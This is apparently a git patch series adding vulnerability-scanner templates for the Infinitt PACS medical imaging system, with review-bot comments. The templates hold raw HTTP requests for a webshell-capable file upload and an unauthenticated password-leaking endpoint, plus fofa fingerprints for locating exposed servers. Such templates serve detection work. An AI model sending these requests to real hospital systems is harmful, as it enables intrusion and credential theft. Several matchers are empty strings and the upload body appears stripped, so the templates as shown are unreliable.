From e6f8c28db2632359fcd4757db57e922ffb05b6bd Mon Sep 17 00:00:00 2001
From: r00t <24542600+adeljck@users.noreply.github.com>
Date: Mon, 9 Dec 2024 00:00:26 +0800
Subject: [PATCH 1/5] infinitt pacs system vuln
add infinitt-pacs-information-leak.yaml and infinitt-pacs-file-upload-vuln.yaml
---
.../infinitt-pacs-file-upload-vuln.yaml | 50 +++++++++++++++++++
.../infinitt-pacs-information-leak.yaml | 35 +++++++++++++
2 files changed, 85 insertions(+)
create mode 100644 http/vulnerabilities/infinitt/infinitt-pacs-file-upload-vuln.yaml
create mode 100644 http/vulnerabilities/infinitt/infinitt-pacs-information-leak.yaml
diff --git a/http/vulnerabilities/infinitt/infinitt-pacs-file-upload-vuln.yaml b/http/vulnerabilities/infinitt/infinitt-pacs-file-upload-vuln.yaml
new file mode 100644
index 00000000000..336f525103e
--- /dev/null
+++ b/http/vulnerabilities/infinitt/infinitt-pacs-file-upload-vuln.yaml
@@ -0,0 +1,50 @@
+id: infinitt-pacs-file-upload-vuln
+
+info:
+ name: Infinitt PACS System File Upload Vulnerability
+ author: adeljck
+ severity: critical
+ description: |
+ Infinitt PACS System is vulnerable to file upload vulnerability which allows an attacker to upload a webshell and gain unauthorized access to the server.
+ remediation: |
+ Ensure that file uploads are properly validated and sanitized. Implement strict access controls and monitoring to detect and prevent unauthorized file uploads.
+
+variables:
+ filename: "{{randstr}}"
+
+http:
+ - raw:
+ - |
+ POST /webservices/WebJobUpload.asmx HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
+ Content-Length: 397
+ Accept-Encoding: gzip, deflate
+ Content-Type: text/xml; charset=utf-8
+ Soapaction: "http://rainier/jobUpload"
+ Connection: close
+
+
+
+
+
+ 1
+
+ {(unknown)}.aspx
+ MTIz
+
+
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: body
+ words:
+ - ""
+ - type: word
+ part: header
+ words:
+ - "text/xml"
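Review bot: The body word matcher in this hunk carries an empty string (`- ""`), which matches any 200 text/xml response and so would flag every host that merely exposes the WebJobUpload.asmx endpoint, independent of whether the upload request was accepted. If the empty value is an extraction artifact of a stripped XML element name the committed file may be fine; otherwise the matcher should name the specific success element of the SOAP response rather than an empty word. The same `- ""` word survives the matcher rewrite in the `@@ -35,16 +38,19 @@ http:` hunk of the rename commit. Relatedly, the request body references `{(unknown)}.aspx` while the only declared variable is `filename`; if that is literal rather than a rendering artifact, the randomized name under `variables` is never interpolated.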
diff --git a/http/vulnerabilities/infinitt/infinitt-pacs-information-leak.yaml b/http/vulnerabilities/infinitt/infinitt-pacs-information-leak.yaml
new file mode 100644
index 00000000000..4e850ab1650
--- /dev/null
+++ b/http/vulnerabilities/infinitt/infinitt-pacs-information-leak.yaml
@@ -0,0 +1,35 @@
+id: infinitt-pacs-information-leak
+
+info:
+ name: Infinitt PACS System Information Leak
+ author: adeljck
+ severity: high
+ description: |
+ Infinitt PACS System is vulnerable to an information leak vulnerability. By sending a crafted request, an attacker can obtain sensitive user information, including passwords.
+ remediation: |
+ Ensure that access to the WebUserLogin.asmx endpoint is restricted and requires authentication. Implement proper access controls and input validation to prevent unauthorized access to sensitive user information.
+
+http:
+ - raw:
+ - |
+ GET /webservices/WebUserLogin.asmx/GetUserInfoByUserID?userID=admin HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Accept-Language: en
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
+ Connection: close
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "web_user_login"
+ part: body
+ - type: word
+ words:
+ - "text/xml"
+ part: header
From 365aa0243805683eae20229350f1f0608657b8c7 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Fri, 13 Dec 2024 14:36:16 +0530
Subject: [PATCH 2/5] Update and rename infinitt-pacs-file-upload-vuln.yaml to
infinitt-pacs-file-upload.yaml
---
...ln.yaml => infinitt-pacs-file-upload.yaml} | 28 +++++++++++--------
1 file changed, 17 insertions(+), 11 deletions(-)
rename http/vulnerabilities/infinitt/{infinitt-pacs-file-upload-vuln.yaml => infinitt-pacs-file-upload.yaml} (64%)
diff --git a/http/vulnerabilities/infinitt/infinitt-pacs-file-upload-vuln.yaml b/http/vulnerabilities/infinitt/infinitt-pacs-file-upload.yaml
similarity index 64%
rename from http/vulnerabilities/infinitt/infinitt-pacs-file-upload-vuln.yaml
rename to http/vulnerabilities/infinitt/infinitt-pacs-file-upload.yaml
index 336f525103e..ed28987e804 100644
--- a/http/vulnerabilities/infinitt/infinitt-pacs-file-upload-vuln.yaml
+++ b/http/vulnerabilities/infinitt/infinitt-pacs-file-upload.yaml
@@ -1,28 +1,31 @@
-id: infinitt-pacs-file-upload-vuln
+id: infinitt-pacs-file-upload
info:
- name: Infinitt PACS System File Upload Vulnerability
+ name: Infinitt PACS System - Arbitary File Upload
author: adeljck
severity: critical
description: |
Infinitt PACS System is vulnerable to file upload vulnerability which allows an attacker to upload a webshell and gain unauthorized access to the server.
remediation: |
Ensure that file uploads are properly validated and sanitized. Implement strict access controls and monitoring to detect and prevent unauthorized file uploads.
+ reference:
+ - https://github.com/wy876/POC/blob/a9e4000fc76d0157b53ade916323b7b8256b17c3/%E8%8B%B1%E9%A3%9E%E8%BE%BE%E5%8C%BB%E5%AD%A6%E5%BD%B1%E5%83%8F%E5%AD%98%E6%A1%A3%E4%B8%8E%E9%80%9A%E4%BF%A1%E7%B3%BB%E7%BB%9F/%E8%8B%B1%E9%A3%9E%E8%BE%BE%E5%8C%BB%E5%AD%A6%E5%BD%B1%E5%83%8F%E5%AD%98%E6%A1%A3%E4%B8%8E%E9%80%9A%E4%BF%A1%E7%B3%BB%E7%BB%9FWebJobUpload%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: icon_hash="1474455751" || icon_hash="702238928"
+ tags: infinitt,file-upload,intrusive,rce
variables:
- filename: "{{randstr}}"
+ filename: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
- Content-Length: 397
- Accept-Encoding: gzip, deflate
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"
- Connection: close
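Review bot: The new `name` value misspells "Arbitrary" as "Arbitary"; the later trailing-space commit rewrites this same line and keeps the typo, so it persists into the final file. Suggest `name: Infinitt PACS System - Arbitrary File Upload`. The `fofa-query` value is a plain scalar with embedded double quotes and `||`; it parses as intended because it does not begin with an indicator, but wrapping the whole value in single quotes would make that unambiguous for linters.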
@@ -35,16 +38,19 @@ http:
+
matchers-condition: and
matchers:
- - type: status
- status:
- - 200
- type: word
part: body
words:
- ""
+
- type: word
- part: header
+ part: content_type
words:
- "text/xml"
+
+ - type: status
+ status:
+ - 200
From 7667e5a732b86dd6353d2d18c17304c584be9ca0 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Fri, 13 Dec 2024 14:57:09 +0530
Subject: [PATCH 3/5] Update and rename infinitt-pacs-information-leak.yaml to
infinitt-pacs-info-leak.yaml
---
...leak.yaml => infinitt-pacs-info-leak.yaml} | 28 +++++++++++--------
1 file changed, 16 insertions(+), 12 deletions(-)
rename http/vulnerabilities/infinitt/{infinitt-pacs-information-leak.yaml => infinitt-pacs-info-leak.yaml} (70%)
diff --git a/http/vulnerabilities/infinitt/infinitt-pacs-information-leak.yaml b/http/vulnerabilities/infinitt/infinitt-pacs-info-leak.yaml
similarity index 70%
rename from http/vulnerabilities/infinitt/infinitt-pacs-information-leak.yaml
rename to http/vulnerabilities/infinitt/infinitt-pacs-info-leak.yaml
index 4e850ab1650..e1fa139cb12 100644
--- a/http/vulnerabilities/infinitt/infinitt-pacs-information-leak.yaml
+++ b/http/vulnerabilities/infinitt/infinitt-pacs-info-leak.yaml
@@ -1,35 +1,39 @@
-id: infinitt-pacs-information-leak
+id: infinitt-pacs-info-leak
info:
- name: Infinitt PACS System Information Leak
+ name: Infinitt PACS System - Information Leak
author: adeljck
severity: high
description: |
Infinitt PACS System is vulnerable to an information leak vulnerability. By sending a crafted request, an attacker can obtain sensitive user information, including passwords.
remediation: |
Ensure that access to the WebUserLogin.asmx endpoint is restricted and requires authentication. Implement proper access controls and input validation to prevent unauthorized access to sensitive user information.
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: icon_hash="1474455751" || icon_hash="702238928"
+ tags: infinitt,info-leak
http:
- raw:
- |
GET /webservices/WebUserLogin.asmx/GetUserInfoByUserID?userID=admin HTTP/1.1
Host: {{Hostname}}
- Accept-Encoding: gzip, deflate
- Accept: */*
- Accept-Language: en
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
- Connection: close
matchers-condition: and
matchers:
- - type: status
- status:
- - 200
- type: word
+ part: body
words:
- "web_user_login"
- part: body
+ - "USER_KEY"
+ condition: and
+
- type: word
+ part: content_type
words:
- "text/xml"
- part: header
+
+ - type: status
+ status:
+ - 200
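Review bot: The `metadata` block added under `info` sets `verified: true` but, unlike the sibling file-upload template updated in the previous commit, includes no `reference` entry naming the advisory or write-up the check was derived from, so a maintainer cannot re-verify the `web_user_login`/`USER_KEY` body signature when the product changes. Suggest adding `reference:` with `- <URL of the source write-up>` above `metadata:`, mirroring the upload template. The second body word `USER_KEY` combined with `condition: and` is a welcome tightening over the single `web_user_login` match and should reduce false positives on error pages.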
From 3aa26de7b759187e3bf8494760a1228bcc1a9934 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Fri, 13 Dec 2024 14:57:23 +0530
Subject: [PATCH 4/5] fix-trail-sapce
---
http/vulnerabilities/infinitt/infinitt-pacs-file-upload.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/http/vulnerabilities/infinitt/infinitt-pacs-file-upload.yaml b/http/vulnerabilities/infinitt/infinitt-pacs-file-upload.yaml
index ed28987e804..97a980dd5cd 100644
--- a/http/vulnerabilities/infinitt/infinitt-pacs-file-upload.yaml
+++ b/http/vulnerabilities/infinitt/infinitt-pacs-file-upload.yaml
@@ -1,7 +1,7 @@
id: infinitt-pacs-file-upload
info:
- name: Infinitt PACS System - Arbitary File Upload
+ name: Infinitt PACS System - Arbitary File Upload
author: adeljck
severity: critical
description: |
From 4713b7def5a4a0f48d2a4fc5e773fa343166b346 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Mon, 23 Dec 2024 10:43:34 +0530
Subject: [PATCH 5/5] Update infinitt-pacs-info-leak.yaml
---
.../infinitt/infinitt-pacs-info-leak.yaml | 19 +++++++++----------
1 file changed, 9 insertions(+), 10 deletions(-)
diff --git a/http/vulnerabilities/infinitt/infinitt-pacs-info-leak.yaml b/http/vulnerabilities/infinitt/infinitt-pacs-info-leak.yaml
index e1fa139cb12..f94d699233a 100644
--- a/http/vulnerabilities/infinitt/infinitt-pacs-info-leak.yaml
+++ b/http/vulnerabilities/infinitt/infinitt-pacs-info-leak.yaml
@@ -1,32 +1,31 @@
-id: infinitt-pacs-info-leak
+id: infinitt-pacs-info-disclosure
info:
- name: Infinitt PACS System - Information Leak
+ name: Infinitt PACS System - Information Disclosure
author: adeljck
severity: high
description: |
- Infinitt PACS System is vulnerable to an information leak vulnerability. By sending a crafted request, an attacker can obtain sensitive user information, including passwords.
+ Infinitt PACS System is vulnerable to an Information Disclosure vulnerability. By sending a crafted request, an attacker can obtain sensitive user information, including passwords.
remediation: |
Ensure that access to the WebUserLogin.asmx endpoint is restricted and requires authentication. Implement proper access controls and input validation to prevent unauthorized access to sensitive user information.
metadata:
verified: true
max-request: 1
fofa-query: icon_hash="1474455751" || icon_hash="702238928"
- tags: infinitt,info-leak
+ tags: infinitt,disclosure,exposure
http:
- - raw:
- - |
- GET /webservices/WebUserLogin.asmx/GetUserInfoByUserID?userID=admin HTTP/1.1
- Host: {{Hostname}}
+ - method: GET
+ path:
+ - "{{BaseURL}}/webservices/WebUserLogin.asmx/GetUserInfoByUserID?userID=admin"
matchers-condition: and
matchers:
- type: word
part: body
words:
- - "web_user_login"
- - "USER_KEY"
+ - ""
+ - ""
condition: and
- type: word